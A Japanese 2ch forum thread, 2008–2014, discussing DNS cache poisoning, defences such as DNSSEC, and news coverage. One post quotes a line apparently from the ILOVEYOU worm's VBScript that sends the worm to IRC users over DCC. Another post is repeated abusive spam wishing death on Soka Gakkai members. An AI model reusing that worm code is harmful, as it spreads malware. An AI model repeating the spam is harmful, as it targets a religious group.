お知らせコーナーを見ると更新が2007年代で止まってる所もあるし、こう言う所は危ないな

100 :名無しさん@お腹いっぱい。:2008/08/10(日) 18:18:15 .net

インターネット終了のお知らせ。
DNSの脆弱性の実証コードがリリースされる。
僅か数分で汚染可能
ttp://news4vip.livedoor.biz/archives/51190869.html

101 :名無しさん@お腹いっぱい。:2008/08/10(日) 22:18:55 .net
>>100
海外のBIND板だと対抗策も出てるけど、本家+第三者加工プログラムみたいな感じで導入が難しいな
Windows環境だと今の所完全防御は絶望的

102 :名無しさん@お腹いっぱい。:2008/08/11(月) 07:49:48 .net
でもさ、ポイズニングって送信元IPアドレスの
詐称ができないとだめなんでしょ?
ISPは出て行くパケットについてのチェックをしてないのかな。


103 :名無しさん@お腹いっぱい。:2008/08/11(月) 14:58:41 .net
>>102
その出て行くパケってのはサーバと言う意味で書いてるの?契約ユーザーいう意味で書いてるの?

管理者の手元にあるサーバからは改変されたパケなんて出ないからチェックする意味が無い
ユーザーからは改変されたパケが飛ぶかもしれないが、それが何を意味するか分からないのに止めたら大問題だ

都合、チェックをする意味が無い
チェックをしたとしても赤の他人のサーバにそれを信じろと言うのは無理だろ?
だからサーバは入ってくるパケの整合性を調べる努力をするしかない

104 :名無しさん@お腹いっぱい。:2008/08/19(火) 01:44:53 .net

結局被害は無しなのな

105 :名無しさん@お腹いっぱい。:2008/08/19(火) 20:50:37 .net
>>104
へ?被害でてるじゃん?
ネット系のニュースで一週間以上も前に見たぞ

いくつか出てたうちの一つはアフィリエイト目的のページに数千人単位で誘導するという豪快なんだか小悪党なんだか分からないやつだったけど
あれがウイルスバラマキじゃなかったから大騒ぎになってないだけ

106 :名無しさん@お腹いっぱい。:2008/08/19(火) 21:43:40 .net
>>105
それって誘導されただけで
被害って程じゃないジャン
振り込め詐欺ぐらいのはないの?

107 :名無しさん@お腹いっぱい。:2008/08/20(水) 01:59:12 .net
誘導に成功してるって事は、ルール無用の自前サーバで何でも出来るって事と同義だよ
あと、折角丁寧にネット上の足跡を消したのに、振り込め詐欺を行うと口座から何から全部残ってしまうから普通はしない
やるならカードの暗証蛮語を入力させる方式で、全世界の好きな所でお金をおろせる方を選ぶだろうね

因みにアフィリエイトに誘導しただけで、検索場を提供してる側には営業利益的に軽く数百万の被害が出ている
キャッシュをクリアした直後の効率低下も考えれば数字にならない阻害も大きい

勿論アフィリエイトを登録されていた側も詐欺的な手法で出来高払いを行わなければならないので、払っていたら被害金額として、払わなくても詐欺の被害を受けている事になる
エンドポイントである一ユーザーの被害は聞こえてこなくても、既に十分に被害が出てるよ

108 :名無しさん@お腹いっぱい。:2008/08/20(水) 07:47:20 .net
アフィリエイト提供側に被害って・・・・
誘導してくれてむしろありがとうだろうw


109 :名無しさん@お腹いっぱい。:2008/08/21(木) 19:10:57 .net
アフィリエイトは相手に悪い印象を与えたら商品のイメージが最悪になる
だから日本の普通のアフィリエイトは小さく邪魔せずページの内容に沿った物が表示される事が多い

検索から誘導されて飛んだページにアフィリだけ置いてあって、しかもページが怪しさ満点だったりするとアフィリまで怪しいと思われかねない
誰も飛ばないバナーなのに表示するだけで金が取られるってアフィリの会社からすると最悪だよ

110 :名無しさん@お腹いっぱい。:2008/08/21(木) 20:53:22 .net
>>109
おまえ、アフィリエイトの仕組み分かってないだろ?
商品の宣伝なんぞのためにアフィはそんざいしているのではないよ

正確には広告主の要望にしたがってサイトを運営してもらうために
金をばら撒いている、というのが本音

111 :名無しさん@お腹いっぱい。:2008/08/22(金) 09:13:28 .net

「ネットの基幹インフラに重大欠陥 暗証番号盗み見も」
http://www.nikkei.co.jp/news/main/20080822AT2G2100D21082008.html
・・・基幹インフラである「DNSサーバー」に欠陥が見つかったとして
注意を呼びかけ始めた。・・・


112 :名無しさん@お腹いっぱい。:2008/08/22(金) 09:42:40 .net
>>111
>被害事例はまだ報告されていないものの

113 :名無しさん@お腹いっぱい。:2008/08/22(金) 09:44:16 .net
cache poisoning自体はずいぶん昔から指摘されていた欠陥だしね今さらな感も

114 :名無しさん@お腹いっぱい。:2008/08/22(金) 15:30:53 .net
DNSの脆弱性問題でISPに被害
http://www.itmedia.co.jp/news/articles/0807/31/news021.html

115 :名無しさん@お腹いっぱい。:2008/08/22(金) 15:41:52 .net
>>111

>>114
の内容は違うんじゃないのか?

>>111 のは"DNSサーバーに偽の住所情報を大量に送りつけると"ってあたりが一連のDNS Spoofingと違う気がする
>>114 のは例の"ポートが固定されていたら〜"から派生する内容だよね?

>>111 の具体的な方法はどんなものだろう?日経の記事は必要以上に丸められていてわからん

116 :名無しさん@お腹いっぱい。:2008/08/22(金) 17:20:47 .net
>>115
いやたぶん同じことを言おうとしているんだと思う
日本ネットワークインフォメーションセンターとやらが
この時期別の危険性を声高に叫ぶはずないでしょ

117 :名無しさん@お腹いっぱい。:2008/08/22(金) 22:13:20 .net
ttp://www.nic.ad.jp/ja/topics/2008/20080822-01.html

いまごろ知ったのか>日経

118 :名無しさん@お腹いっぱい。:2008/08/23(土) 02:23:09 .net
日経・・・日本のオンライン経済活動に疎いんじゃないのか
何にしてもあの記事の書き方は知識がある人が見ても謎な文章だから、そうじゃない人には尚更だっただろう

もしかしてネットワーク系の会社の株を操作したんじゃあるまいな〜
多分ちょっとは下がってるはずだし、場の雰囲気が悪化したと思うが

119 :名無しさん@お腹いっぱい。:2008/08/27(水) 06:49:07 .net
今、NHKでこれのニュースが有った。
「専用のプログラムを使用すれば対策出来る」とのこと。
被害例として、金融システムにアクセスしようとしたら、詐欺サイトうんぬん。

煽ってる割には、だからどうすんねん!というニュースでした。

120 :名無しさん@お腹いっぱい。:2008/08/27(水) 08:50:32 .net
>「専用のプログラムを使用すれば対策出来る」

なんと便利な解説>NHK
この言葉,いつでも使えそうだな(笑

121 :名無しさん@お腹いっぱい。:2008/08/29(金) 18:53:12 .net
これに絡んでエンタープライズウォッチで自社製品の売り込みしてる
おっさんの記事見て思ったんだけど、
自由度40億で破るのに10時間かかるなら、DNSのリクエストを2回送って
二つのレスポンスをクロスチェックするだけで、
自由度が1600京になって安全性を確保できるんじゃね?



122 :名無しさん@お腹いっぱい。:2008/08/29(金) 20:16:11 .net
そう言うのはBINDの有志が組んだものがあるけど、最初の名前解決に恐ろしい程時間がかかるよ
個人なら耐えられるけど、ISPでは耐えられないかも
あと、複数参照は攻撃された部位が上流の場合は同じ汚染情報を受け取ってしまうのも弱点

個人的にはDNSSECお勧め

123 :名無しさん@お腹いっぱい。:2008/08/30(土) 05:10:10 .net
問い合わせ二回だから時間が2倍になるってこと?
それ以上というニュアンスで受け取ったけど、なぜだろう・・・?

124 :名無しさん@お腹いっぱい。:2008/08/31(日) 02:22:25 .net
まずフォワード先は最低3カ所は必要
なぜなら二つではどちらかが汚染されてたとしても同数だから多数決で判断できなくなるから
フォワード先は上流の分かれた奇数カ所が望ましいとされている
日本の場合は外部からの再帰的問い合わせに答えるDNSサーバが80カ所以上あるので、これは何とかなる

フォワード先を増やすと、基本的には全ての解決が終了してからでないと汚染確認が始まらない
フォワード先のDNSサーバが名前解決を失敗したり、回線の都合で立ち消えになったりすると、タイムオーバーまで名前解決が停止する
一度キャッシュされた後は通常と同じ速度で再帰的問い合わせに答えるが、キャッシュ生存時間が過ぎれば再び同じ手順を経る事になる
多数のフォワード先を利用する都合、最も遅いDNSサーバの影響を大きく受ける

自分の上流のDNSサーバ以外を利用する為、今まで5〜10msで解決出来ていたものが20〜40ms掛かるようになり、更に汚染確認の処理が入る為50msを越える事が多くなる

125 :名無しさん@お腹いっぱい。:2008/08/31(日) 20:33:57 .net
>>124
分からないので教えてほしいのですが、
外部のフォワーダ3台以上使って各応答を検証する特殊な仕組みを作るより、
普通のフルサービスリゾルバ持って自力でルートから素直に辿るほうが
自然そうなんですけれど、それじゃ駄目?


126 :名無しさん@お腹いっぱい。:2008/08/31(日) 23:39:07 .net
>>125
124じゃないが答えてみる

その方法だと一部のサーバにすげぇ無理が行くし、フルサービスリゾルバって結局は他力本願なキャッシュサーバーだよな
そこに問い合わせる方法が安全でも中身が腐ってたら意味なさそう

あと124も分かってて端折ってるのかも知れんが直接攻撃でキャッシュ書き換えられたらどーしよーもない
多数のフォーワードに聞きに行く方法は自分は攻撃されないだろうという楽観的な対策のひとつに過ぎんよ

127 :名無しさん@お腹いっぱい。:2008/09/01(月) 00:14:18 .net
やっぱり根元的な対策はDNSSECしかないのでは

128 :名無しさん@お腹いっぱい。:2008/09/01(月) 07:40:58 .net
根本的な問題として,
IPにおける送信元アドレスの詐称は動揺もないのか?

129 :名無しさん@お腹いっぱい。:2008/09/01(月) 07:41:18 .net
動揺→どうしよう

130 :名無しさん@お腹いっぱい。:2008/09/03(水) 00:07:25 .net
技術的には可能だろうけど、主観時間的に不可能だし、予算的に不可能だし、フォーマット的に不可能だと思う

131 :名無しさん@お腹いっぱい。:2008/09/05(金) 09:55:17 .net
何か全然被害ないねえ
ハッカーどうしたの?

132 :名無しさん@お腹いっぱい。:2008/09/06(土) 02:31:38 .net
OCNだけどようやくGREATになった

133 :名無しさん@お腹いっぱい。:2008/09/06(土) 10:39:51 .net

詳細が明かされたDNSキャッシュ・ポイズニングの新手法
ぜい弱性の有無のチェックと対策は計画的かつ確実に

ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080811/312660/

134 :名無しさん@お腹いっぱい。:2008/09/06(土) 11:12:57 .net
テストできないよね?
https://www.dns-oarc.net/oarc/services/dnsentropy

135 :名無しさん@お腹いっぱい。:2008/09/06(土) 11:45:10 .net
ん? できたけど

ちなみにbiglobeだけどすべてGREATですた!

136 :124:2008/09/06(土) 20:36:41 .net
>>126
ごめんなさい、やっぱり分かりません。私が意図してたのは、
・各応答を検証する仕組みは、自宅 or 自サイトで持つサーバで作るのだろう(推測)
・その仕組みから、ヨソ(外部組織)の野良キャッシュサーバを多数使う?
・それなら自宅内で BIND でも何でもいいからあげて、ルート→jp→co.jpと順次辿る、
 ルートサーバとオリジンサーバを信じる普通のやり方でいいのでは。
ということです。
検証のため(?)という理屈で知らない人からの再帰クエリーを送りつけられる、
ヨソのキャッシュサーバたちの方が「一部のサーバにすごい負荷」な状態に
あたるのではないかなと。

「直接攻撃でキャッシュ書き換えられたらどーしよーもない」には同感です。
外部組織からの再帰検索を受けつける甘いサーバより、自宅 BIND の方が信じられそう。



137 :名無しさん@お腹いっぱい。:2008/09/12(金) 12:17:12 .net
http://support.microsoft.com/kb/956190/
NATの下のプライベートなDNS(Win2003のDC)だけど関係あんの?

138 :名無しさん@お腹いっぱい。:2008/09/17(水) 14:32:50 .net
「攻撃トラフィック」発信源、ワースト1位は日本 | WIRED VISION
http://wiredvision.jp/news/200809/2008091122.html

>攻撃トラフィックの発信源、すなわち「分散型サービス拒否」(DDoS)攻撃や、
>ハッキング行為、DNS(ドメイン・ネーム・システム)ハイジャックのトラフィ
>ックが特に多かったのは、日本[30.07%。前期の3.56%(7位)から急浮上した]、
>米国[21.52%]、中国[8.90%]、ドイツ [5.56%]だった。

139 :名無しさん@お腹いっぱい。:2009/02/25(水) 11:54:41 .net

DNS (Domain Name System) 総合
http://pc11.2ch.net/test/read.cgi/network/1159978850/l50


140 :名無しさん@お腹いっぱい。:2009/10/21(水) 14:06:16 .net
誰か教えて下さい。

うちのサイトをグーグルのキャッシュで表示すると
全然別のドメインでクッキー許可のポーズ画面(プイバシーの警告)が表示されます。
(当サイトではそもそもクッキーは使用していません。)

詳細情報を見ると searchportal.information・・・何とかかんとかの文字が・・・

「searchportal.information」をグーグルで検索すると

DNSポイズニングsearchportal.information.comがやってきた! - SEO
http://www.search-seo.info/2008/11/dnssearchportalinformationcom.html

DNSポイズニングってヤバイのでしょうか?
新種のアタッキングでしょうか?  対処方法はないでしょうか?
そもそも何故グーグルのキャッシュページにプライバシーの警告画面がでるんでしょうか?

誰か教えて下さい。



141 :名無しさん@お腹いっぱい。:2011/01/09(日) 20:41:05 .net
Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

142 :名無しさん@お腹いっぱい。:2012/03/24(土) 20:01:13.22 .net
てst

143 :名無しさん@お腹いっぱい。:2012/03/24(土) 20:06:26.62 .net
とりあえず対策としてルータのDNSフォワードは使わず、OSのDNS設定にDNS Benchmark(GRC)で調べたエラーのなく高速なDNSアドレスを幾つか列記でおk?

144 :名無しさん@お腹いっぱい。:2012/10/11(木) 06:44:54.25 .net
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね 
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね 
創,価
死,ね


145 :名無しさん@お腹いっぱい。:2013/07/22(月) NY:AN:NY.AN .net
Ubuntuフォーラムに不正アクセス、ユーザー情報が流出
http://www.itmedia.co.jp/enterprise/articles/1307/22/news077.html

146 :名無しさん@お腹いっぱい:2014/02/11(火) 04:27:39.79 .net
hosyu age

147 : 忍法帖【Lv=40,xxxPT】(1+0:8) :2014/04/15(火) 19:56:11.22 .net
ttp://www.e-ontap.com/blog/20140415.html
ttp://www.e-ontap.com/dns/endofdns.html
ttp://www.e-ontap.com/dns/endofdns2.html

スレ再利用的にageとく

148 :名無しさん@お腹いっぱい。:2014/04/16(水) 10:04:43.58 .net
DNSSEC Validation対応しているISPはどのくらいあるんだ?

総レス数 148
48 KB
掲示板に戻る 全部 前100 次100 最新50
read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★